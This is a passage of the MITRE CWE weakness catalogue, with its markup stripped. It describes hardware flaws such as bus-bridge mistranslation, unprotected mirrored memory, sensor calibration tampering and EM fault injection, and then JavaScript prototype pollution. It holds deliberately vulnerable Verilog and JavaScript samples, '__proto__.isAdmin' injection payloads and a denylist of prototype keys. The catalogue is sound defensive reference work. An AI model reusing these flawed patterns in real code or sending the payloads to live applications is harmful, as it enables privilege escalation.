integration and can be identified later during Testing. - - - Manufacturing - This issue could be introduced during manufacturing and can be identified later during Testing. - - - - - Other - Varies by Context - Reduce Maintainability - High - A consequence of this is that the system is unable to be patched and leaves it in a vulnerable state. - - - - - Architecture and Design - Implementation - - - 1. Secure patch support to allow ROM code to be patched at next boot. - 2. Support patches that can be programmed in-field or during manufacturing through hardware fuses. This feature can be used to do limited patching of device after shipping or for next batch of silicon devices manufactured without changing the full device ROM. - - - Moderate - - Some part of the hardware initialization or signature verification done to authenticate patches will always be "not patchable." Hardware-fuse-based patches will also have limitations in terms of size and the number of patches that can be supported. - - - - - - - A System-on-Chip (SOC) implements a Root-of-Trust (RoT) in ROM to boot secure code. However, at times this ROM code might have security vulnerabilities and need to be patched. Since ROM is immutable, it can be impossible to patch. - - ROM does not have built-in application-programming interfaces (APIs) to patch if the code is vulnerable. Implement mechanisms to patch the vulnerable ROM code. - - - - - - - - - - - Narasimha Kumar V Mangipudi - Intel Corporation - 2020-04-25 - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - - CWE Content Team - MITRE - 2021-07-20 - updated Demonstrative_Examples, Maintenance_Notes - - - - - The bridge incorrectly translates security attributes from either trusted to untrusted or from untrusted to trusted when converting from one fabric protocol to another. - - A bridge allows IP blocks supporting different fabric protocols to be integrated into the system. Fabric end-points or interfaces usually have dedicated signals to transport security attributes. For example, HPROT signals in AHB, AxPROT signals in AXI, and MReqInfo and SRespInfo signals in OCP. - The values on these signals are used to indicate the security attributes of the transaction. These include the immutable hardware identity of the controller initiating the transaction, privilege level, and type of transaction (e.g., read/write, cacheable/non-cacheable, posted/non-posted). - A weakness can arise if the bridge IP block, which translates the signals from the protocol used in the IP block endpoint to the protocol used by the central bus, does not properly translate the security attributes. As a result, the identity of the initiator could be translated from untrusted to trusted or vice-versa. This could result in access-control bypass, privilege escalation, or denial of service. - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Integrity - Access Control - Modify Memory - Read Memory - Gain Privileges or Assume Identity - Bypass Protection Mechanism - Execute Unauthorized Code or Commands - - - - - Architecture and Design - The translation must map signals in such a way that untrusted agents cannot map to trusted agents or vice-versa. - - - Implementation - Ensure that the translation maps signals in such a way that untrusted agents cannot map to trusted agents or vice-versa. - - - - - - The bridge interfaces between OCP and AHB end points. OCP uses MReqInfo signal to indicate security attributes, whereas AHB uses HPROT signal to indicate the security attributes. The width of MReqInfo can be customized as needed. In this example, MReqInfo is 5-bits wide and carries the privilege level of the OCP controller. - The values 5’h11, 5’h10, 5’h0F, 5’h0D, 5’h0C, 5’h0B, 5’h09, 5’h08, 5’h04, and 5’h02 in MReqInfo indicate that the request is coming from a privileged state of the OCP bus controller. Values 5’h1F, 5’h0E, and 5’h00 indicate untrusted, privilege state. - Though HPROT is a 5-bit signal, we only consider the lower, two bits in this example. HPROT values 2’b00 and 2’b10 are considered trusted, and 2’b01 and 2’b11 are considered untrusted. - The OCP2AHB bridge is expected to translate trusted identities on the controller side to trusted identities on the responder side. Similarly, it is expected to translate untrusted identities on the controller side to untrusted identities on the responder side. - - - module ocp2ahb - ( - ahb_hprot, - ocp_mreqinfo - ); - - output [1:0] ahb_hprot; // output is 2 bit signal for AHB HPROT - input [4:0] ocp_mreqinfo; // input is 5 bit signal from OCP MReqInfo - wire [6:0] p0_mreqinfo_o_temp; // OCP signal that transmits hardware identity of bus controller - - wire y; - reg [1:0] ahb_hprot; - - // hardware identity of bus controller is in bits 5:1 of p0_mreqinfo_o_temp signal - assign p0_mreqinfo_o_temp[6:0] = {1'b0, ahb_hprot[4:0], y}; - - always @* - - begin - case (p0_mreqinfo_o_temp[4:2]) - 000: ahb_hprot = 2'b11; // OCP MReqInfo to AHB HPROT mapping - 001: ahb_hprot = 2'b00; - 010: ahb_hprot = 2'b00; - 011: ahb_hprot = 2'b01; - 100: ahb_hprot = 2'b00; - 101: ahb_hprot = 2'b00; - 110: ahb_hprot = 2'b10; - 111: ahb_hprot = 2'b00; - endcase - end - endmodule - - - Logic in the case statement only checks for MReqInfo bits 4:2, i.e., hardware-identity bits 3:1. When ocp_mreqinfo is 5’h1F or 5’h0E, p0_mreqinfo_o_temp[2] will be 1. As a result, untrusted IDs from OCP 5’h1F and 5’h0E get translated to trusted ahb_hprot values 2’b00. - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Manna - Intel Corporation - 2020-05-24 - - - - - The firewall in an on-chip fabric protects the main addressed region, but it does not protect any mirrored memory or memory-mapped-IO (MMIO) regions. - - Few fabrics mirror memory and address ranges, where mirrored regions contain copies of the original data. This redundancy is used to achieve fault tolerance. Whatever protections the fabric firewall implements for the original region should also apply to the mirrored regions. If not, an attacker could bypass existing read/write protections by reading from/writing to the mirrored regions to leak or corrupt the original data. - - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Integrity - Access Control - Modify Memory - Read Memory - Bypass Protection Mechanism - - - - - Manual Dynamic Analysis - Using an external debugger, send write transactions to mirrored regions to test if original, write-protected regions are modified. Similarly, send read transactions to mirrored regions to test if the original, read-protected signals can be read. - High - - - - - Architecture and Design - The fabric firewall should apply the same protections as the original region to the mirrored regions. - - - Implementation - The fabric firewall should apply the same protections as the original region to the mirrored regions. - - - - - A memory-controller IP block is connected to the on-chip fabric in a System on Chip (SoC). The memory controller is configured to divide the memory into four parts: one original and three mirrored regions inside the memory. The upper two bits of the address indicate which region is being addressed. 00 indicates the original region and 01, 10, and 11 are used to address the mirrored regions. All four regions operate in a lock-step manner and are always synchronized. The firewall in the on-chip fabric is programmed to protect the assets in the memory. - The firewall only protects the original range but not the mirrored regions. - The attacker (as an unprivileged user) sends a write transaction to the mirrored region. The mirrored region has an address with the upper two bits set to “10” and the remaining bits of the address pointing to an asset. The firewall does not block this write transaction. Once the write is successful, contents in the protected-memory region are also updated. Thus, the attacker can bypass existing, memory protections. - Firewall should protect mirrored regions. - - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati K. Manna - Intel Corporation - 2020-06-01 - - - - - During runtime, the hardware allows for test or debug logic (feature) to be activated, which allows for changing the state of the hardware. This feature can alter the intended behavior of the system and allow for alteration and leakage of sensitive data by an adversary. - - An adversary can take advantage of test or debug logic that is made accessible through the hardware during normal operation to modify the intended behavior of the system. For example, an accessible Test/debug mode may allow read/write access to any system data. Using error injection (a common test/debug feature) during a transmit/receive operation on a bus, data may be modified to produce an unintended message. Similarly, confidentiality could be compromised by such features allowing access to secrets. - - - - - - - - - - - - - Architecture and Design - Such issues could be introduced during hardware architecture and design and identified later during Testing or System Configuration phases. - - - Implementation - Such issues could be introduced during implementation and identified later during Testing or System Configuration phases. - - - Integration - Such issues could be introduced during integration and identified later during Testing or System configuration phases. - - - - - Confidentiality - Integrity - Availability - Modify Memory - Read Memory - DoS: Crash, Exit, or Restart - DoS: Instability - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - DoS: Resource Consumption (Other) - Execute Unauthorized Code or Commands - Gain Privileges or Assume Identity - Bypass Protection Mechanism - Alter Execution Logic - Quality Degradation - Unexpected State - Reduce Performance - Reduce Reliability - - - - - Architecture and Design - Insert restrictions on when the hardware's test or debug features can be activated. For example, during normal operating modes, the hardware's privileged modes that allow access to such features cannot be activated. Configuring the hardware to only enter a test or debug mode within a window of opportunity such as during boot or configuration stage. The result is disablement of such test/debug features and associated modes during normal runtime operations. - - - Implementation - Insert restrictions on when the hardware's test or debug features can be activated. For example, during normal operating modes, the hardware's privileged modes that allow access to such features cannot be activated. Configuring the hardware to only enter a test or debug mode within a window of opportunity such as during boot or configuration stage. The result is disablement of such test/debug features and associated modes during normal runtime operations. - - - Integration - Insert restrictions on when the hardware's test or debug features can be activated. For example, during normal operating modes, the hardware's privileged modes that allow access to such features cannot be activated. Configuring the hardware to only enter a test or debug mode within a window of opportunity such as during boot or configuration stage. The result is disablement of such test/debug features and associated modes during normal runtime operations. - - - - - - - - - - Brent Sherman - Accellera IP Security Assurance (IPSA) Working Group - 2020-08-06 - - - - - The device does not write-protect the parametric data values for sensors that scale the sensor value, allowing untrusted software to manipulate the apparent result and potentially damage hardware or cause operational failure. - - Various sensors are used by hardware to detect any devices operating outside of the design limits. The threshold limit values are set by hardware fuses or trusted software such as the BIOS. These limits may be related to thermal, power, voltage, current, and frequency. Hardware mechanisms may be used to protect against alteration of the threshold limit values by untrusted software. - The limit values are generally programmed in standard units for the type of value being read. However, the hardware-sensor blocks may report the settings in different units depending upon sensor design and operation. The raw sensor output value is converted to the desired units using a scale conversion based on the parametric data programmed into the sensor. The final converted value is then compared with the previously programmed limits. - While the limit values are usually protected, the sensor parametric data values may not be. By changing the parametric data, safe operational limits may be bypassed. - - - - - - - - - - - - - - Architecture and Design - The lack of a requirement to protect parametric values may contribute to this weakness. - - - Implementation - The lack of parametric value protection may be a cause of this weakness. - - - - - Availability - Quality Degradation - DoS: Resource Consumption (Other) - High - Sensor value manipulation, particularly thermal or power, may allow physical damage to occur or disabling of the device by a false fault shutdown causing a Denial-Of-Service. - - - - - Architecture and Design - Access controls for sensor blocks should ensure that only trusted software is allowed to change threshold limits and sensor parametric data. - High - - - - - - Malicious software executes instructions to increase power consumption to the highest possible level while causing the clock frequency to increase to its maximum value. - Such a program executing for an extended period of time would likely overheat the device, possibly resulting in permanent damage to the device. - - A ring, oscillator-based temperature sensor will generally report the sensed value as - oscillator frequency rather than degrees centigrade. The temperature sensor will have - calibration values that are used to convert the detected frequency into the corresponding temperature in degrees centigrade. - - Consider a SoC design where the critical maximum temperature limit is set in fuse values to 100C and - is not modifiable by software. If the scaled thermal sensor output equals or exceeds this limit, the system is commanded to shut itself down. - - The thermal sensor calibration values are programmable through registers that are exposed to system software. - These registers allow software to affect the converted temperature output such that the output will never exceed the maximum temperature limit. - - - The sensor frequency value is scaled by applying the function: - Sensed Temp = a + b * Sensor Freq - where a and b are the programmable calibration data coefficients. Software sets a and b to zero ensuring the sensed - temperature is always zero. - - This weakness may be addressed by preventing access to a and b. - - The sensor frequency value is scaled by applying the function: - Sensed Temp = a + b * Sensor Freq - where a and b are the programmable calibration data coefficients. Untrusted software is prevented from changing the values of either a or b, - preventing this method of manipulating the temperature. - - - - - - CVE-2017-8252 - Kernel can inject faults in computations during the execution of TrustZone leading to information disclosure in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice and Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8252 - - - - - - - - - - - Hareesh Khattri, Parbati K. Manna, and Arun Kanuparthi - The Intel Corporation - 2020-07-14 - - - - - The bus controller enables bits in the fabric end-point to allow responder devices to control transactions on the fabric. - - To support reusability, certain fabric interfaces and end points provide a configurable register bit that allows IP blocks connected to the controller to access other peripherals connected to the fabric. This allows the end point to be used with devices that function as a controller or responder. If this bit is set by default in hardware, or if firmware incorrectly sets it later, a device intended to be a responder on a fabric is now capable of controlling transactions to other devices and might compromise system security. - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - System Configuration - - - - - Access Control - Modify Memory - Read Memory - Bypass Protection Mechanism - - - - - Architecture and Design - For responder devices, the register bit in the fabric end-point that enables the bus controlling capability must be set to 0 by default. This bit should not be set during secure-boot flows. Also, writes to this register must be access-protected to prevent malicious modifications to obtain bus-controlling capability. - - - Implementation - For responder devices, the register bit in the fabric end-point that enables the bus controlling capability must be set to 0 by default. This bit should not be set during secure-boot flows. Also, writes to this register must be access-protected to prevent malicious modifications to obtain bus-controlling capability. - - - System Configuration - For responder devices, the register bit in the fabric end-point that enables the bus controlling capability must be set to 0 by default. This bit should not be set during secure-boot flows. Also, writes to this register must be access-protected to prevent malicious modifications to obtain bus-controlling capability. - - - - - A typical, phone platform consists of the main, compute core or CPU, a DRAM-memory chip, an audio codec, a baseband modem, a power-management-integrated circuit (“PMIC”), a connectivity (WiFi and Bluetooth) modem, and several other analog/RF components. The main CPU is the only component that can control transactions, and all the other components are responder-only devices. All the components implement a PCIe end-point to interface with the rest of the platform. The responder devices should have the bus-control-enable bit in the PCIe-end-point register set to 0 in hardware to prevent the devices from controlling transactions to the CPU or other peripherals. - The audio-codec chip does not have the bus-controller-enable-register bit hardcoded to 0. There is no platform-firmware flow to verify that the bus-controller-enable bit is set to 0 in all responders. - Audio codec can now master transactions to the CPU and other platform components. Potentially, it can modify assets in other platform components to subvert system security. - Platform firmware includes a flow to check the configuration of bus-controller-enable bit in all responder devices. If this register bit is set on any of the responders, platform firmware sets it to 0. Ideally, the default value of this register bit should be hardcoded to 0 in RTL. It should also have access control to prevent untrusted entities from setting this bit to become bus controllers. - - - - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati K. Manna - Intel Corporation - 2020-05-19 - - - - - The address map of the on-chip fabric has protected and unprotected regions overlapping, allowing an attacker to bypass access control to the overlapping portion of the protected region. - - Various ranges can be defined in the system-address map, either in the memory or in Memory-Mapped-IO (MMIO) space. These ranges are usually defined using special range registers that contain information, such as base address and size. Address decoding is the process of determining for which range the incoming transaction is destined. To ensure isolation, ranges containing secret data are access-control protected. - Occasionally, these ranges could overlap. The overlap could either be intentional (e.g. due to a limited number of range registers or limited choice in choosing size of the range) or unintentional (e.g. introduced by errors). Some hardware designs allow dynamic remapping of address ranges assigned to peripheral MMIO ranges. In such designs, intentional address overlaps can be created through misconfiguration by malicious software. When protected and unprotected ranges overlap, an attacker could send a transaction and potentially compromise the protections in place, violating the principle of least privilege. - - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Integrity - Access Control - Authorization - Bypass Protection Mechanism - Read Memory - Modify Memory - Medium - - - - - Automated Dynamic Analysis - Review address map in specification to see if there are any overlapping ranges. - High - - - Manual Static Analysis - Negative testing of access control on overlapped ranges. - High - - - - - Architecture and Design - When architecting the address map of the chip, ensure that protected and unprotected ranges are isolated and do not overlap. When designing, ensure that ranges hardcoded in Register-Transfer Level (RTL) do not overlap. - - - Implementation - Ranges configured by firmware should not overlap. If overlaps are mandatory because of constraints such as a limited number of registers, then ensure that no assets are present in the overlapped portion. - - - Testing - Validate mitigation actions with robust testing. - - - - - An on-chip fabric supports a 64KB address space that is memory-mapped. The fabric has two range registers that support creation of two protected ranges with specific size constraints--4KB, 8KB, 16KB or 32KB. Assets that belong to user A require 4KB, and those of user B require 20KB. Registers and other assets that are not security-sensitive require 40KB. One range register is configured to program 4KB to protect user A’s assets. Since a 20KB range cannot be created with the given size constraints, the range register for user B’s assets is configured as 32KB. The rest of the address space is left as open. As a result, some part of untrusted and open-address space overlaps with user B range. - The fabric does not support least privilege, and an attacker can send a transaction to the overlapping region to tamper with user B data. - Since range B only requires 20KB but is allotted 32KB, there is 12KB of reserved space. Overlapping this region of user B data, where there are no assets, with the untrusted space will prevent an attacker from tampering with user B data. - - - - - CVE-2009-4419 - Attacker can modify MCHBAR register to overlap with an attacker-controlled region, which modification prevents the SENTER instruction from properly applying VT-d protection while a Measured Launch Environment is being launched. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4419 - - - - - - - - - - As of CWE 4.6, CWE-1260 and CWE-1316 are siblings under view 1000, but CWE-1260 might be a parent of CWE-1316. More analysis is warranted. - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna - Intel Corporation - 2020-06-01 - - - - - A bridge that is connected to a fabric without security features forwards transactions to the slave without checking the privilege level of the master. Similarly, it does not check the hardware identity of the transaction received from the slave interface of the bridge. - - In hardware designs, different IP blocks are connected through interconnect-bus fabrics (e.g. AHB and OCP). Within a System on Chip (SoC), the IP block subsystems could be using different bus protocols. In such a case, the IP blocks are then linked to the central bus (and to other IP blocks) through a fabric bridge. Bridges are used as bus-interconnect-routing modules that link different protocols or separate, different segments of the overall SoC interconnect. - For overall system security, it is important that the access-control privileges associated with any fabric transaction are consistently maintained and applied, even when they are routed or translated by a fabric bridge. A bridge that is connected to a fabric without security features forwards transactions to the slave without checking the privilege level of the master and results in a weakness in SoC access-control security. The same weakness occurs if a bridge does not check the hardware identity of the transaction received from the slave interface of the bridge. - - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Integrity - Access Control - Availability - DoS: Crash, Exit, or Restart - Bypass Protection Mechanism - Read Memory - Modify Memory - Medium - - - - - Automated Dynamic Analysis - RTL simulation to ensure that bridge-access controls are implemented properly. - High - - - Manual Static Analysis - Formal verification of bridge RTL to ensure that access control cannot be bypassed. - High - - - - - Architecture and Design - Design includes provisions for access-control checks in the bridge for both upstream and downstream transactions. - - - Implementation - Implement access-control checks in the bridge for both upstream and downstream transactions. - - - - - The iLPC2AHB bridge connects a CPU (with multiple, privilege levels, such as user, super user, debug, etc.) over AHB interface to an LPC bus. Several peripherals are connected to the LPC bus. The bridge is expected to check the privilege level of the transactions initiated in the core before forwarding them to the peripherals on the LPC bus. - The bridge does not implement the checks and allows reads and writes from all privilege levels. - To address this, designers should implement hardware-based checks that are either hardcoded to block untrusted agents from accessing secure peripherals or implement firmware flows that configure the bridge to block untrusted agents from making arbitrary reads or writes. - - - - - CVE-2019-6260 - Baseboard Management Controller (BMC) device implements Advanced High-performance Bus (AHB) bridges that do not require authentication for arbitrary read and write access to the BMC's physical address space from the host, and possibly the network [REF-1138]. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6260 - - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna - Intel Corporation - 2020-05-19 - - - - - On-chip fabrics or buses either do not support or are not configured to support privilege separation or other security features, such as access control. - - Certain on-chip fabrics and buses, especially simple and low-power buses, do not support security features. Apart from data transfer and addressing ports, some fabrics and buses do not have any interfaces to transfer privilege, immutable identity, or any other security attribute coming from the bus master. Similarly, they do not have dedicated signals to transport security-sensitive data from slave to master, such as completions for certain types of transactions. Few other on-chip fabrics and buses support security features and define specific interfaces/signals for transporting security attributes from master to slave or vice-versa. However, including these signals is not mandatory and could be left unconfigured when generating the register-transfer-level (RTL) description for the fabric. Such fabrics or buses should not be used to transport any security attribute coming from the bus master. In general, peripherals with security assets should not be connected to such buses before the transaction from the bus master reaches the bus, unless some form of access control is performed at a fabric bridge or another intermediate module. - - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Integrity - Access Control - Availability - DoS: Crash, Exit, or Restart - Read Memory - Modify Memory - Medium - - - - - Architecture or Design Review - Review the fabric specification and ensure that it contains signals to transfer security-sensitive signals. - High - - - Manual Static Analysis - Source Code - Lack of security features can also be confirmed through manual RTL review of the fabric RTL. - High - - - - - Architecture and Design - If fabric does not support security features, implement security checks in a bridge or any component that is between the master and the fabric. Alternatively, connect all fabric slaves that do not have any security assets under one such fabric and connect peripherals with security assets to a different fabric that supports security features. - - - - - - Several systems on chips (SoCs) use the Advanced-Microcontroller Bus Architecture (AMBA) Advanced-Peripheral Bus (APB) protocol. APB is a simple, low-power bus and uses the PPROT[2:0] bits to indicate the security state of the bus masters ;PPROT[0] indicates privilege, PPROT[1] indicates secure/non-secure transaction, and PPROT[2] indicates instruction/data. Assume that there is no fabric bridge in the SoC. One of the slaves, the power-management unit, contains registers that store the thermal-shutdown limits. - The APB bus is used to connect several bus masters, each with a unique and immutable hardware identity, to several slaves. For a CPU supporting 8 potential identities (each with varying privilege levels), 16 types of outgoing transactions can be made--8 read transactions with each supported privilege level and 8 write transactions with each supported privilege level. - Since APB PPROT can only support up to 8 transaction types, access-control checks cannot be performed on transactions going to the slaves at the right granularity for all possible transaction types. Thus, potentially, user code running on the CPU could maliciously corrupt the thermal-shutdown-configuration registers to burn the device, resulting in permanent denial of service. - In this scenario, only peripherals that need access protection from 8 of the 16 possible transaction types can be connected to the APB bus. Peripherals that require protection from the remaining 8 transaction types can be connected to a different APB bus. Alternatively, a bridge could be implemented to handle such complex scenarios before forwarding traffic to the APB bus. - - - The Open-Core-Protocol (OCP) fabric supports two configurable, width-optional signals for transporting security attributes: MReqInfo and SRespInfo. MReqInfo is used to transport security attributes from bus master to slave, and SRespInfo is used to transport security attributes from slave to bus master. An SoC uses OCP to connect several bus masters, each with a unique and immutable hardware identity, to several slaves. One of the bus masters, the CPU, reports the privilege level (user or super user) in addition to the unique identity. One of the slaves, the power-management unit, contains registers that store the thermal-shutdown limits. - Since MReqInfo and SRespInfo are not mandatory, these signals are not configured when autogenerating RTL for the OCP fabric. Thus, the fabric cannot be used to transport security attributes from bus masters to slave. - Code running at user-privilege level on the CPU could maliciously corrupt the thermal-shutdown-configuration registers to burn the device and cause permanent denial of service. - To address this, configure the fabric to include MReqInfo and SRespInfo signals and use these to transport security identity and privilege level to perform access-control checks at the slave interface. - - - - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna - Intel Corporation - 2020-05-20 - - - - - The device is susceptible to electromagnetic fault injection attacks, causing device internal information to be compromised or security mechanisms to be bypassed. - - Electromagnetic fault injection may allow an attacker to locally and dynamically modify the signals (both internal and external) of an integrated circuit. EM-FI attacks consist of producing a local, transient magnetic field near the device, inducing current in the device wires. A typical EMFI setup is made up of a pulse injection circuit that generates a high current transient in an EMI coil, producing an abrupt magnetic pulse which couples to the target producing faults in the device, which can lead to: - - Bypassing security mechanisms such as secure JTAG or Secure Boot - Leaking device information - Modifying program flow - Perturbing secure hardware modules (e.g. random number generators) - - - - - - - - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Integrity - Access Control - Availability - Modify Memory - Read Memory - Gain Privileges or Assume Identity - Bypass Protection Mechanism - Execute Unauthorized Code or Commands - - - - - Architecture and Design - Implementation - - - 1. Redundancy – By replicating critical operations and comparing the two outputs can help indicate whether a fault has been injected. - 2. Error detection and correction codes - Gay, Mael, et al. proposed a new scheme that not only detects faults injected by a malicious adversary but also automatically corrects single nibble/byte errors introduced by low-multiplicity faults. - 3. Fail by default coding - When checking conditions (switch or if) check all possible cases and fail by default because the default case in a switch (or the else part of a cascaded if-else-if construct) is used for dealing with the last possible (and valid) value without checking. This is prone to fault injection because this alternative is easily selected as a result of potential data manipulation [REF-1141]. - 4. Random Behavior - adding random delays before critical operations, so that timing is not predictable. - 5. Program Flow Integrity Protection – The program flow can be secured by integrating run-time checking aiming at detecting control flow inconsistencies. One such example is tagging the source code to indicate the points not to be bypassed [REF-1147]. - 6. Sensors – Usage of sensors can detect variations in voltage and current. - 7. Shields – physical barriers to protect the chips from malicious manipulation. - - - - - - - In many devices, security related information is stored in fuses. These fuses are loaded into shadow registers at boot time. Disturbing this transfer phase with EM-FI can lead to the shadow registers storing erroneous values potentially resulting in reduced security. - Colin O'Flynn has demonstrated an attack scenario which uses electro-magnetic glitching during booting to bypass security and gain read access to flash, read and erase access to shadow memory area (where the private password is stored). Most devices in the MPC55xx and MPC56xx series that include the Boot Assist Module (BAM) (a serial or CAN bootloader mode) are susceptible to this attack. In this paper, a GM ECU was used as a real life target. While the success rate appears low (less than 2 percent), in practice a success can be found within 1-5 minutes once the EMFI tool is setup. In a practical scenario, the author showed that success can be achieved within 30-60 minutes from a cold start. - - - - - - - - - - - - - - - - This entry is attack-oriented and may require significant modification in future versions, or even deprecation. It is not clear whether there is really a design "mistake" that enables such attacks, so this is not necessarily a weakness and may be more appropriate for CAPEC. - - - - Sebastien Leger, Rohini Narasipur - Bosch - 2020-08-27 - - - - - This entry has been deprecated because it was a duplicate of CWE-170. All content has been transferred to CWE-170. - - - CWE Community - 2006-07-19 - Submitted by members of the CWE community to extend early CWE versions - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Causal_Nature, Common_Consequences, Description, Likelihood_of_Exploit, Name, Relationships, Type - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Name - - Miscalculated Null Termination - DEPRECATED (Duplicate): Miscalculated Null Termination - - - - Untrusted agents can disable alerts about signal conditions exceeding limits or the response mechanism that handles such alerts. - - - Hardware sensors are used to detect whether a device is operating within design limits. The threshold values for these limits are set by hardware fuses or trusted software such as a BIOS. - Modification of these limits may be protected by hardware mechanisms. - When device sensors detect out of bound conditions, alert signals may be generated for remedial action, which may take the form of device shutdown or throttling. - Warning signals that are not properly secured may be disabled or used to generate spurious alerts, causing degraded performance or denial-of-service (DoS). - These alerts may be masked by untrusted software. Examples of these alerts involve thermal and power sensor alerts. - - - - - - - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Availability - DoS: Instability - DoS: Crash, Exit, or Restart - Reduce Reliability - Unexpected State - High - - - - - Architecture and Design - Alert signals generated by critical events should be protected from access by untrusted agents. Only hardware or trusted firmware modules should be able to alter the alert configuration. - - - - - - Consider a platform design where a Digital-Thermal Sensor (DTS) is used to monitor temperature and compare that output against a threshold value. - If the temperature output equals or exceeds the threshold value, the DTS unit sends an alert signal to the processor. - The processor, upon getting the alert, input triggers system shutdown. The alert signal is handled as a General-Purpose-I/O (GPIO) pin in input mode. - - The processor-GPIO controller exposes software-programmable controls that allow untrusted software to reprogram the state of the GPIO pin. - Reprogramming the state of the GPIO pin allows malicious software to trigger spurious alerts or to set the alert pin to a zero value so that thermal sensor alerts are not received by the processor. - The GPIO alert-signal pin is blocked from untrusted software access and is controlled only by trusted software, such as the System BIOS. - - - - - - - - - Hareesh Khattri, Arun Kanuparthi, Parbati K. Manna - Intel Corporation - 2020-05-29 - - - - - The software receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype. - - By adding or modifying attributes of an object prototype, it is possible to create attributes that exist on every object, or replace critical attributes with malicious ones. This can be problematic if the software depends on existence or non-existence of certain attributes, or uses pre-defined attributes of object prototype (such as hasOwnProperty, toString or valueOf). - This weakness is usually exploited by using a special attribute of objects called proto, constructor or prototype. Such attributes give access to the object prototype. This weakness is often found in code that assigns object attributes based on user input, or merges or clones objects recursively. - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Modify Application Data - High - An attacker can inject attributes that are used in other components. - - - Availability - DoS: Crash, Exit, or Restart - High - An attacker can override existing attributes with ones that have incompatible type, which may lead to a crash. - - - - - Implementation - By freezing the object prototype first (for example, Object.freeze(Object.prototype)), modification of the prototype becomes impossible. - High - While this can mitigate this weakness completely, other methods are recommended when possible, especially in components used by upstream software ("libraries"). - - - Architecture and Design - By blocking modifications of attributes that resolve to object prototype, such as proto or prototype, this weakness can be mitigated. - High - - - Implementation - Input Validation - When handling untrusted objects, validating using a schema can be used. - Limited - - - Implementation - By using an object without prototypes (via Object.create(null) ), adding object prototype attributes by accessing the prototype via the special attributes becomes impossible, mitigating this weakness. - High - - - Implementation - Map can be used instead of objects in most cases. If Map methods are used instead of object attributes, it is not possible to access the object prototype or modify it. - Moderate - - - - - This function sets object attributes based on a dot-separated path. - - - function setValueByPath (object, path, value) { - - const pathArray = path.split("."); - const attributeToSet = pathArray.pop(); - let objectToModify = object; - for (const attr of pathArray) { - if (typeof objectToModify[attr] !== 'object') { - objectToModify[attr] = {}; - } - objectToModify = objectToModify[attr]; - } - objectToModify[attributeToSet] = value; - return object; - } - - - - This function does not check if the attribute resolves to the object prototype. These codes can be used to add "isAdmin: true" to the object prototype. - - - setValueByPath({}, "__proto__.isAdmin", true) - setValueByPath({}, "constructor.prototype.isAdmin", true) - - - By using a denylist of dangerous attributes, this weakness can be eliminated. - - - function setValueByPath (object, path, value) { - - const pathArray = path.split("."); - const attributeToSet = pathArray.pop(); - let objectToModify = object; - for (const attr of pathArray) { - - // Ignore attributes which resolve to object prototype - if (attr === "__proto__" || attr === "constructor" || attr === "prototype") { - - continue; - } - - if (typeof objectToModify[attr] !== "object") { - - objectToModify[attr] = {}; - } - - objectToModify = objectToModify[attr]; - } - - objectToModify[attributeToSet] = value; - return object; - } - - - - - - - - CVE-2018-3721 - Prototype pollution by merging objects. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3721 - - - CVE-2019-10744 - Prototype pollution by setting default values to object attributes recursively. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10744 - - - CVE-2019-11358 - Prototype pollution by merging objects recursively. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11358 - - - CVE-2020-8203 - Prototype pollution by setting object attributes based on dot-separated path. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8203 - - - - - - - - - - - - - - Anonymous External Contributor - 2020-08-25 - - - - - - The product uses a non-blocking model that relies on a single threaded process - for features such as scalability, but it contains code that can block when it is invoked. - - When an attacker can directly invoke the blocking code, or the blocking code can be affected by environmental conditions that can be influenced by an attacker, then this can lead to a denial of service by causing unexpected hang or freeze of the code. Examples of blocking code might be an expensive computation or calling - blocking library calls, such as those that perform exclusive file operations or require a successful network operation. - Due to limitations in multi-thread models, single-threaded - models are used to overcome the resource constraints that are caused by using - many threads. In such a model, all code should generally be - non-blocking. If blocking code is called, then the event loop will - effectively be stopped, which can be undesirable or dangerous. Such - models are used in Python asyncio, Vert.x, and Node.js, or other - custom event loop code. - - - - - - - - - Implementation - - - - - Availability - DoS: Resource Consumption (CPU) - An unexpected call to blocking code can trigger an infinite loop, or a large loop that causes the software to pause and wait indefinitely. - - - - - Implementation - Generally speaking, blocking calls should be - replaced with non-blocking alternatives that can be used asynchronously. - Expensive computations should be passed off to worker threads, although - the correct approach depends on the framework being used. - - - Implementation - For expensive computations, consider breaking them up into - multiple smaller computations. Refer to the documentation of the - framework being used for guidance. - - - - - - - - Joe Harvey - 2019-10-25 - - - - - Trace data collected from several sources on the - System-on-Chip (SoC) is stored in unprotected locations or - transported to untrusted agents. - - To facilitate 